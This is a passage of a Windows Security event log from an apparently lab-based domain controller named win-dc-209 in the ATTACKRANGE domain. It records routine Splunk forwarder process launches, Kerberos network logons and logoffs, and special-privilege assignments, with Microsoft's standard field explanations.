Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x141c
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 02:45:55 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4634
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logoff
OpCode=Info
RecordNumber=264060
Keywords=Audit Success
Message=An account was logged off.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x7A98A8
Logon Type: 3
This event is generated when a logon session is destroyed. It may be positively correlated with a logon event using the Logon ID value. Logon IDs are only unique between reboots on the same computer.
04/19/2021 02:45:55 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4624
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logon
OpCode=Info
RecordNumber=264059
Keywords=Audit Success
Message=An account was successfully logged on.
Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Logon Information:
Logon Type: 3
Restricted Admin Mode: -
Virtual Account: No
Elevated Token: Yes
Impersonation Level: Impersonation
New Logon:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE.LOCAL
Logon ID: 0x7A98A8
Linked Logon ID: 0x0
Network Account Name: -
Network Account Domain: -
Logon GUID: {D86F149B-DAEC-EE97-650F-2B5A9BD5B8D7}
Process Information:
Process ID: 0x0
Process Name: -
Network Information:
Workstation Name: -
Source Network Address: ::1
Source Port: 51802
Detailed Authentication Information:
Logon Process: Kerberos
Authentication Package: Kerberos
Transited Services: -
Package Name (NTLM only): -
Key Length: 0
This event is generated when a logon session is created. It is generated on the computer that was accessed.
The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.
The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).
The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.
The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.
The impersonation level field indicates the extent to which a process in the logon session can impersonate.
The authentication information fields provide detailed information about this specific logon request.
- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.
- Transited services indicate which intermediate services have participated in this logon request.
- Package name indicates which sub-protocol was used among the NTLM protocols.
- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.
04/19/2021 02:45:55 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4672
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Special Logon
OpCode=Info
RecordNumber=264058
Keywords=Audit Success
Message=Special privileges assigned to new logon.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x7A98A8
Privileges: SeSecurityPrivilege
SeBackupPrivilege
SeRestorePrivilege
SeTakeOwnershipPrivilege
SeDebugPrivilege
SeSystemEnvironmentPrivilege
SeLoadDriverPrivilege
SeImpersonatePrivilege
SeDelegateSessionUserImpersonatePrivilege
SeEnableDelegationPrivilege
04/19/2021 02:46:08 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=264061
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0xd40
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 02:46:09 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=264063
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x1528
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 02:46:09 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=264062
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x1be4
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 02:46:10 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=264064
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x17f4
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 02:46:11 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4624
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logon
OpCode=Info
RecordNumber=264065
Keywords=Audit Success
Message=An account was successfully logged on.
Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Logon Information:
Logon Type: 3
Restricted Admin Mode: -
Virtual Account: No
Elevated Token: Yes
Impersonation Level: Delegation
New Logon:
Security ID: ATTACKRANGE\WIN-HOST-797$
Account Name: WIN-HOST-797$
Account Domain: ATTACKRANGE.LOCAL
Logon ID: 0x7AB2CD
Linked Logon ID: 0x0
Network Account Name: -
Network Account Domain: -
Logon GUID: {DC6104D6-8644-C624-5E2A-37E68DB9CAB8}
Process Information:
Process ID: 0x0
Process Name: -
Network Information:
Workstation Name: -
Source Network Address: 10.0.1.15
Source Port: 53333
Detailed Authentication Information:
Logon Process: Kerberos
Authentication Package: Kerberos
Transited Services: -
Package Name (NTLM only): -
Key Length: 0
This event is generated when a logon session is created. It is generated on the computer that was accessed.
The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.
The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).
The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.
The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.
The impersonation level field indicates the extent to which a process in the logon session can impersonate.
The authentication information fields provide detailed information about this specific logon request.
- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.
- Transited services indicate which intermediate services have participated in this logon request.
- Package name indicates which sub-protocol was used among the NTLM protocols.
- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.
04/19/2021 02:46:13 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=264066
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0xea8
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 02:46:14 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=264068
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x1064
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 02:46:14 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=264067
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x155c
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 02:46:21 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4634
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logoff
OpCode=Info
RecordNumber=264069
Keywords=Audit Success
Message=An account was logged off.
Subject:
Security ID: ATTACKRANGE\WIN-HOST-797$
Account Name: WIN-HOST-797$
Account Domain: ATTACKRANGE
Logon ID: 0x7AB2CD
Logon Type: 3
This event is generated when a logon session is destroyed. It may be positively correlated with a logon event using the Logon ID value. Logon IDs are only unique between reboots on the same computer.
04/19/2021 02:46:55 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4634
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logoff
OpCode=Info
RecordNumber=264072
Keywords=Audit Success
Message=An account was logged off.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x7AD2BB
Logon Type: 3
This event is generated when a logon session is destroyed. It may be positively correlated with a logon event using the Logon ID value. Logon IDs are only unique between reboots on the same computer.
04/19/2021 02:46:55 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4624
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logon
OpCode=Info
RecordNumber=264071
Keywords=Audit Success
Message=An account was successfully logged on.
Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Logon Information:
Logon Type: 3
Restricted Admin Mode: -
Virtual Account: No
Elevated Token: Yes
Impersonation Level: Impersonation
New Logon:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE.LOCAL
Logon ID: 0x7AD2BB
Linked Logon ID: 0x0
Network Account Name: -
Network Account Domain: -
Logon GUID: {D86F149B-DAEC-EE97-650F-2B5A9BD5B8D7}
Process Information:
Process ID: 0x0
Process Name: -
Network Information:
Workstation Name: -
Source Network Address: ::1
Source Port: 51815
Detailed Authentication Information:
Logon Process: Kerberos
Authentication Package: Kerberos
Transited Services: -
Package Name (NTLM only): -
Key Length: 0
This event is generated when a logon session is created. It is generated on the computer that was accessed.
The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.
The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).
The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.
The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.
The impersonation level field indicates the extent to which a process in the logon session can impersonate.
The authentication information fields provide detailed information about this specific logon request.
- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.
- Transited services indicate which intermediate services have participated in this logon request.
- Package name indicates which sub-protocol was used among the NTLM protocols.
- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.
04/19/2021 02:46:55 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4672
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Special Logon
OpCode=Info
RecordNumber=264070
Keywords=Audit Success
Message=Special privileges assigned to new logon.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x7AD2BB
Privileges: SeSecurityPrivilege
SeBackupPrivilege
SeRestorePrivilege
SeTakeOwnershipPrivilege
SeDebugPrivilege
SeSystemEnvironmentPrivilege
SeLoadDriverPrivilege
SeImpersonatePrivilege
SeDelegateSessionUserImpersonatePrivilege
SeEnableDelegationPrivilege
04/19/2021 02:47:08 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=264073
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0xcd4
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 02:47:09 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=264075
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x1240
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 02:47:09 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=264074
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x1aac
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 02:47:10 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=264076
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x87c
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 02:47:13 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=264077
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x1878
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 02:47:14 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=264079
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0xd08
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 02:47:14 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=264078
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x191c
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
